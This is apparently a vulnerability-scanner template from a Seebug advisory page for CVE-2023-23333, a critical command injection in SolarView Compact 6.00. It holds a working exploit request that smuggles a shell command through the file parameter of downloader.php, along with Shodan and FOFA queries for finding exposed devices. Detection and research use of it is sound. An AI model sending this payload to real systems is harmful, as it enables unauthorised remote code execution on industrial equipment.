id: CVE-2023-23333 info: name: SolarView Compact 6.00 - OS Command Injection author: Mr-xn severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php. reference: - https://github.com/Timorlover/CVE-2023-23333 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23333 - https://github.com/Mr-xn/CVE-2023-23333 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 epss-score: 0.95016 metadata: max-request: 1 shodan-query: http.html:"SolarView Compact" fofa-query: body="SolarView Compact" && title="Top" verified: true tags: injection,solarview,edb,packetstorm,cve,cve2023,rce variables: cmd: "id" http: - raw: - | @timeout: 25s GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1 Host: {{Hostname}} Accept-Charset: utf-8 Accept-Encoding: gzip, deflate Connection: close matchers: - type: word part: body words: - "uid=" - "gid=" condition: and
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论